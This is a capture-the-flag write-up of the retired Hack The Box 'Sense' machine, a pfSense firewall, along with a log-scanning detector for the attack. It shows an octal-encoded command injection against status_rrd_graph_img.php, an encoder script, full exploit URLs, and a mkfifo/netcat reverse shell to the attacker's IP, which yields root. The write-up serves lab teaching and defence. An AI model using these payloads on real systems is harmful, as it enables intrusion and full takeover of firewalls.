
Hackthebox.eu - Sense - Retired - Updated



Recon


I've been using threader3000 for my recon scans on HTB. It does a staged scan: first a very quick up/down sweep of all TCP ports, then it feeds the open ports into an nmap scan. It saves the nmap results as XML automatically, which I then convert to HTML to make them readable.




xsltproc ./10.10.10.60/10.10.10.60.xml -o ./sense.html





Just two ports open, 80 and 443. It looks like 80 is lighttpd 1.4.35.


When I try to browse using the DNS name I added to my /etc/hosts,


I get this message.



Weird.


First it redirects me to HTTPS, then I get this error message.


If I try it by IP address instead,




we get redirected to HTTPS again, and this time we get a login page for pfSense,

which is an open source firewall project.






https://www.pfsense.org/


A quick Google search shows the default credentials for this should be


Username: admin

Password: pfsense


But that doesn't work.


Not much to go on now. Let's see if there is anything else on the web server by brute forcing for other directories and files with dirb.




Dirb found us some new directories, but not much to go forward with.


So we still don't have much of anything to go on. Let's try scanning with another tool and a different wordlist to see if we get different responses. It's always a good idea to try multiple tools and multiple lists.


This time I used DirBuster and the list

/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 


I added txt,html,conf,bak,sh to the file extensions so it would look for those file types too.


And with the different list we did see a couple of new files:



changelog.txt and system-users.txt


Let's see what the changelog.txt has in it.


https://10.10.10.60/changelog.txt



# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window


2 of 3 vulnerabilities have been patched, which means there is one that hasn't, right? Good news for us.


What about system-users.txt?


https://10.10.10.60/system-users.txt



####Support ticket###

Please create the following user


username: Rohit
password: company defaults



OK, it looks like a ticket asking for an account named rohit to be created with the company default password.


Now does that mean Sense.htb's own default password, or the default password from the company that made the software?


We have no way of knowing what the internal default password for the Sense company might be, but we did already find the default password set by pfSense:


Password: pfsense


Let's try logging in with


Username: rohit

Password: pfsense



It worked. Let's see if we can find a way to get code execution from this panel somewhere.





Exploit



It took me a while to find a non-Metasploit path forward here.


I eventually came across a couple of blogs.


https://spencerdodd.github.io/2018/01/14/pfsense-arbitrary-code-execution/


The first shows that the RRD graph image page (status_rrd_graph_img.php) is vulnerable to command injection: the sanitation of the user input neglected to strip out the "|" character, which we can use to pipe the output of one command into another. It also points out that if you octal encode your payload you can bypass the sanitation altogether.


So combining these, the pipe lets us feed printf's output into sh, and octal encoding means the URL itself only has to carry backslashes and digits: printf on the target decodes them back into the real command string and sh runs it. That lets us issue any command we want, including ones containing characters the page would otherwise filter.
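To make the mechanics concrete, here is an added example (not the write-up's encoder.py and not pfSense code) that encodes a command the way the URLs below do, emulates what printf on the target hands to sh, and checks that the on-the-wire payload contains nothing but backslashes and digits. The host, the status_rrd_graph_img.php path and the queues;printf '...'|sh shape are taken from the write-up; the percent-encoding via urllib.parse.quote is my addition.

```python
import re
import string
from urllib.parse import quote

# Added example, not the write-up's encoder.py or the pfSense code. It shows
# the mechanics behind the octal trick: the URL carries only backslashes and
# digits, the target's printf turns them back into bytes, and sh runs them.

_OCTAL_ESCAPE = re.compile(r"\\([0-7]{1,3})")  # POSIX printf: 1 to 3 octal digits
_WIRE_ALPHABET = set(string.digits + "\\")


def octal_encode(command: str) -> str:
    """Escape every byte of the command as \\ddd, e.g. 'ping' -> '\\160\\151\\156\\147'."""
    return "".join("\\" + oct(byte)[2:] for byte in command.encode())


def printf_decode(escaped: str) -> str:
    """Emulate what `printf '<escaped>'` writes on the target.

    Literal characters pass through; each \\ddd becomes the byte with that
    octal value. Because every byte was escaped, an escape always ends where
    the next backslash begins, so 2- and 3-digit escapes never collide.
    """
    out = bytearray()
    i = 0
    while i < len(escaped):
        m = _OCTAL_ESCAPE.match(escaped, i)
        if m:
            out.append(int(m.group(1), 8) & 0xFF)
            i = m.end()
        else:
            out.extend(escaped[i].encode())
            i += 1
    return out.decode()


def wire_payload_is_clean(encoded: str) -> bool:
    """True when the payload is only digits and backslashes, so a filter that
    strips slashes, spaces, quotes or metacharacters has nothing to remove
    (the semicolon and pipe around printf are the only special characters left)."""
    return set(encoded) <= _WIRE_ALPHABET


def build_exploit_url(host: str, command: str) -> str:
    """Rebuild the request shape from the write-up for an arbitrary command.

    The database parameter is the injection point; quote() percent-encodes the
    quotes, pipe and semicolon so the URL is unambiguous to any client.
    """
    injected = f"queues;printf '{octal_encode(command)}'|sh"
    return f"https://{host}/status_rrd_graph_img.php?database={quote(injected, safe='')}"


if __name__ == "__main__":
    cmd = "ping -c 4 10.10.14.10"  # the write-up's first test command
    enc = octal_encode(cmd)
    assert printf_decode(enc) == cmd  # what sh receives is exactly what we typed
    print(enc)
    print(build_exploit_url("10.10.10.60", cmd))
```

Running it with the write-up's ping command reproduces the octal string shown further down exactly, and printf_decode() is a quick way to sanity-check a long payload before pasting it into a browser.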


I then found this site with a POC in Python:


https://vulners.com/packetstorm/PACKETSTORM:145909


I had trouble getting the POC to work, but I borrowed from its code to write a little encoding script of my own.


import sys

# Usage: python3 encoder.py "<shell command>"
# Prints the command, then the exploit URL with the command octal-encoded.
if len(sys.argv) != 2:
    sys.exit("usage: encoder.py '<shell command>'")

stager = sys.argv[1]
encoded = ""

print(stager)
for c in stager:
    # oct() gives e.g. '0o160'; drop the prefix and add the backslash printf expects
    encoded += "\\" + oct(ord(c))[2:]

# printf decodes the escapes on the target, then sh runs the result
exploit_url = ("https://10.10.10.60/status_rrd_graph_img.php?database=queues;"
               + "printf+'" + encoded + "'|sh")
print(exploit_url)



It accepts an argument from the command line, octal encodes it, and inserts it into what the final URL will be.


I wanted to start with a bit of a POC of my own: just see if I can get Sense to ping back to my machine.


So first let's start up tcpdump to listen for ICMP on my VPN tunnel interface


sudo tcpdump -i tun0 -n icmp


Then with my little encoder script, which I named encoder.py,


I encoded "ping -c 4 10.10.14.10":


python3 ./encoder.py "ping -c 4 10.10.14.10"


Which gave me the following output.





ping -c 4 10.10.14.10
https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\160\151\156\147\40\55\143\40\64\40\61\60\56\61\60\56\61\64\56\61\60'|sh



I copied that link into Firefox and...





We got pings back.


So we have working RCE on pfSense.


So let's try netcat now to get a reverse shell.


First let's set up our listener.

nc -lnvp 5555


I had trouble getting nc to work and couldn't get a reverse shell back. My guess at this point was that nc was restricted somehow or was an incompatible version.


I tried a bunch of different variations of a reverse shell and finally found one that worked on

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp



Netcat OpenBSD

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f


So the first thing I did was modify it to use my VPN IP and port:


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



So I ran that through the little encoder.py:


python3 ./encoder.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



And I got this back as the encoded URL:


https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\162\155\40\57\164\155\160\57\146\73\155\153\146\151\146\157\40\57\164\155\160\57\146\73\143\141\164\40\57\164\155\160\57\146\174\57\142\151\156\57\163\150\40\55\151\40\62\76\46\61\174\156\143\40\61\60\56\61\60\56\61\64\56\61\60\40\65\65\65\65\40\76\57\164\155\160\57\146'|sh


And once that was pasted back into Firefox...



We got our shell as root.


Let's grab those flags and call it a day.





And just for grins and giggles I went back to the nc reverse shell I had problems with in the beginning and saw this.


This version of netcat doesn't have the -e option for handing the connection to a program; pfSense is FreeBSD-based and ships the OpenBSD-derived nc, which never had it.


Unlike the traditional netcat or ncat, which do. That is why the nc -e style shells failed and the mkfifo variant above works: it wires nc's input and output to /bin/sh through a named pipe instead of relying on -e.
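On the defensive side, here is an added example that is not part of the write-up: a small detector for the request shape used above, run over constructed access-log lines in common log format (they were not captured from the box). It flags requests to status_rrd_graph_img.php whose database parameter carries shell metacharacters or a run of printf-style octal escapes, and it decodes the query string the way the server does so that percent-encoded variants are caught too. The path and parameter name come from the write-up; the log format and thresholds are my assumptions.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus, urlsplit

# Added example, not part of the write-up: a detector for the request shape
# used above. It flags requests to status_rrd_graph_img.php whose "database"
# parameter carries shell metacharacters or a run of printf-style octal
# escapes. The log lines below are constructed in common log format to
# illustrate; they were not captured from the box.

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[;|&`$<>]")             # characters that start or redirect a command
OCTAL_RUN = re.compile(r"(?:\\[0-7]{2,3}){4,}")   # four or more consecutive \ddd escapes


def parse_query(query: str) -> dict[str, list[str]]:
    """Split a query string the way the server will see it.

    Splits on '&' only: some urllib.parse.parse_qs versions also split on
    ';', which would cut 'queues;printf ...' down to 'queues' and hide the
    injection. '+' and %XX are decoded because PHP decodes them too.
    """
    params: dict[str, list[str]] = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def suspicious_database_param(uri: str) -> list[str]:
    """Return the reasons a request URI looks like the rrd graph injection
    (empty list when the database parameter looks like a plain file name)."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/status_rrd_graph_img.php"):
        return []
    reasons = []
    for value in parse_query(parts.query).get("database", []):
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacter in database={value[:48]!r}")
        if OCTAL_RUN.search(value):
            reasons.append("octal-escaped payload in database parameter")
    return reasons


def scan_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Return (client, uri, reasons) for every log line that trips a check."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        reasons = suspicious_database_param(m.group("uri"))
        if reasons:
            hits.append((line.split()[0], m.group("uri"), reasons))
    return hits


# Constructed sample: a normal graph request, the write-up's ping payload,
# a percent-encoded variant, and an unrelated request.
SAMPLE_LOG = r'''
10.10.14.10 - - [01/Jan/2021:12:00:01 -0500] "GET /status_rrd_graph_img.php?database=queues HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.10 - - [01/Jan/2021:12:00:02 -0500] "GET /status_rrd_graph_img.php?database=queues;printf+'\160\151\156\147\40\55\143\40\64\40\61\60\56\61\60\56\61\64\56\61\60'|sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.10 - - [01/Jan/2021:12:00:03 -0500] "GET /status_rrd_graph_img.php?database=queues%3Bid%7Csh HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.10.14.10 - - [01/Jan/2021:12:00:04 -0500] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''.strip().splitlines()


if __name__ == "__main__":
    for client, uri, reasons in scan_log(SAMPLE_LOG):
        print(client, uri[:60], *reasons, sep="\n  ")
```

The two checks are deliberately independent: the metacharacter check catches the plain queues;id|sh form, while the octal-run check catches payloads whose body has been encoded to dodge a character filter, as in this box. Legitimate database names such as queues or wan-traffic.rrd trip neither.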




